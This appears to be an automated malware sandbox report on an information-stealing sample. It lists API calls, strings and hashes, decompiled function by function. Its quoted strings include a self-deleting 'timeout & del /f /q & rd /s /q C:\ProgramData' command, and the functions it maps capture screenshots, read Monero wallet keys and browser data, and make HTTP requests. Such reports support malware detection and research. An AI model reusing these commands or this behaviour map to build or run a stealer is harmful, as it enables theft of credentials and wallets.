                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00038296
                                                                                                                                                                                          • _memset.LIBCMT ref: 000382A5
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 000382BA
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 00038456
                                                                                                                                                                                          • _memset.LIBCMT ref: 00038465
                                                                                                                                                                                          • _memset.LIBCMT ref: 00038477
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00038487
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • " & rd /s /q "C:\ProgramData\, xrefs: 00038333
                                                                                                                                                                                          • /c timeout /t 10 & del /f /q ", xrefs: 000382E5
                                                                                                                                                                                          • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00038390
                                                                                                                                                                                          • " & exit, xrefs: 00038389
                                                                                                                                                                                          • " & exit, xrefs: 000383DA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                          • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                          • API String ID: 2823247455-1079830800
                                                                                                                                                                                          • Opcode ID: 2b4c6f86b69c23e6c721a2d42a11241b1ae01369aab2042883adb539aed592ea
                                                                                                                                                                                          • Instruction ID: 8cfd75989eb6bff0457cc6cd3dba589962c2b7fabe239caebe77118961afaaa5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b4c6f86b69c23e6c721a2d42a11241b1ae01369aab2042883adb539aed592ea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9651A9B1D402299BCF62EF64DC92ADDB3BCAB44704F8101E5AB18B7152DB306F868F54
                                                                                                                                                                                          Function 000309A2 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 110memorystringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 000309D5
                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00030A15
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00030A6A
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00030A71
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00030AA7
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00056E3C), ref: 00030AB6
                                                                                                                                                                                            • Part of subcall function 00031684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0003169F
                                                                                                                                                                                            • Part of subcall function 00031684: _memset.LIBCMT ref: 000316CE
                                                                                                                                                                                            • Part of subcall function 00031684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 000316F6
                                                                                                                                                                                            • Part of subcall function 00031684: lstrcatA.KERNEL32(?,00056ECC,?,?,?,?,?), ref: 00031713
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00030ACD
                                                                                                                                                                                            • Part of subcall function 000323D5: malloc.MSVCRT ref: 000323DA
                                                                                                                                                                                            • Part of subcall function 000323D5: strncpy.MSVCRT ref: 000323EB
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 00030AF0
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                          • String ID: :\$C$QuBi
                                                                                                                                                                                          • API String ID: 1856320939-239756005
                                                                                                                                                                                          • Opcode ID: a26fd4bf825ea03458eb7fda25d0809f948c1041f177575ae9d629e8ed6e2ca8
                                                                                                                                                                                          • Instruction ID: 9b78ba4f4addcd4ad0cec0a808a13a718db90e26c841ca622c88fc905fb42c08
                                                                                                                                                                                          • Opcode Fuzzy Hash: a26fd4bf825ea03458eb7fda25d0809f948c1041f177575ae9d629e8ed6e2ca8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B419FB190022CABCB259F78AC4AADEBABCEF1D304F0100E5F549E7121D6708F958F61
                                                                                                                                                                                          Function 00031F55 Relevance: 18.1, APIs: 12, Instructions: 147COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00031F96
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00031FA4
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00031FB1
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00031FDE
                                                                                                                                                                                          • GetHGlobalFromStream.COMBASE(?,?), ref: 00032049
                                                                                                                                                                                          • GlobalLock.KERNEL32(?), ref: 00032052
                                                                                                                                                                                          • GlobalSize.KERNEL32(?), ref: 0003205E
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00025482: lstrlenA.KERNEL32(?), ref: 00025519
                                                                                                                                                                                            • Part of subcall function 00025482: StrCmpCA.SHLWAPI(?,00056986,0005697B,0005697A,0005696F), ref: 00025588
                                                                                                                                                                                            • Part of subcall function 00025482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000255AA
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 000320BC
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 000320D7
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 000320E0
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 000320E8
                                                                                                                                                                                          • CloseWindow.USER32(00000000), ref: 000320EF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: GlobalObject$Window$DeleteSelectStreamlstrcpy$CloseCreateDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1802806997-0
                                                                                                                                                                                          • Opcode ID: 74a49de70e7d9af437af0706947cca41ed745e04db42ddab927e936c51571e05
                                                                                                                                                                                          • Instruction ID: 9b24e3b476b0cea51f3f218b1ffbabb413038d1947f97115fd72709833556dc0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74a49de70e7d9af437af0706947cca41ed745e04db42ddab927e936c51571e05
                                                                                                                                                                                          • Instruction Fuzzy Hash: E851C272800118AFDF11AFA0ED4D9EEBFB9EF0C318B154465F909E2121EB309995DBA1
                                                                                                                                                                                          Function 000368C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00026963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000269C5
                                                                                                                                                                                            • Part of subcall function 00026963: StrCmpCA.SHLWAPI(?), ref: 000269DF
                                                                                                                                                                                            • Part of subcall function 00026963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00026A0E
                                                                                                                                                                                            • Part of subcall function 00026963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00026A4D
                                                                                                                                                                                            • Part of subcall function 00026963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00026A7D
                                                                                                                                                                                            • Part of subcall function 00026963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00026A88
                                                                                                                                                                                            • Part of subcall function 00026963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00026AAC
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0003691A
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00036925
                                                                                                                                                                                            • Part of subcall function 00031E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00036931,?), ref: 00031E37
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,?), ref: 0003693A
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00036949
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00036962
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                          • API String ID: 4174444224-1526165396
                                                                                                                                                                                          • Opcode ID: 19d66792a3971675daf1f945ae2e8aa3475de6ba810b73987c9bb48fd0a3497f
                                                                                                                                                                                          • Instruction ID: e651d7a46dc8f02214b9dbd15b9121c7e3047e76534e77a2f967038e17d975a1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19d66792a3971675daf1f945ae2e8aa3475de6ba810b73987c9bb48fd0a3497f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C21BE31910114BBCF22BB74EC4A9EE7BBCAF15311F508266FD09E7153DB3299898B91
                                                                                                                                                                                          Function 0002EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0094C481), ref: 0002EAF9
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0094C481), ref: 0002EB56
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0002EE1D
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0094C481), ref: 0002EC33
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0094C481), ref: 0002ECE3
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0094C481), ref: 0002ED40
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy
                                                                                                                                                                                          • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                          • API String ID: 3722407311-2697854757
                                                                                                                                                                                          • Opcode ID: 10489bba2e70a4ea80515a53d9587f91396f5c9e05483bb18093639f2271bb95
                                                                                                                                                                                          • Instruction ID: 50c38e847517c4da970e6c7e612f9d5eff57b164922985fd2fbb58cdaeb0de3b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 10489bba2e70a4ea80515a53d9587f91396f5c9e05483bb18093639f2271bb95
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3B15932D00519AFDF20FFA8ED47BCEB7B5AF44314F554150FD08AB252DA30AA598B92
                                                                                                                                                                                          Function 00021AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00021ADC
                                                                                                                                                                                            • Part of subcall function 00021A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00021A65
                                                                                                                                                                                            • Part of subcall function 00021A51: HeapAlloc.KERNEL32(00000000), ref: 00021A6C
                                                                                                                                                                                            • Part of subcall function 00021A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00021AE9), ref: 00021A89
                                                                                                                                                                                            • Part of subcall function 00021A51: RegQueryValueExA.ADVAPI32(00021AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00021AA4
                                                                                                                                                                                            • Part of subcall function 00021A51: RegCloseKey.ADVAPI32(00021AE9), ref: 00021AAD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00021AF1
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00021AFE
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.keys), ref: 00021B19
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00021C2A
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00021C9D
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
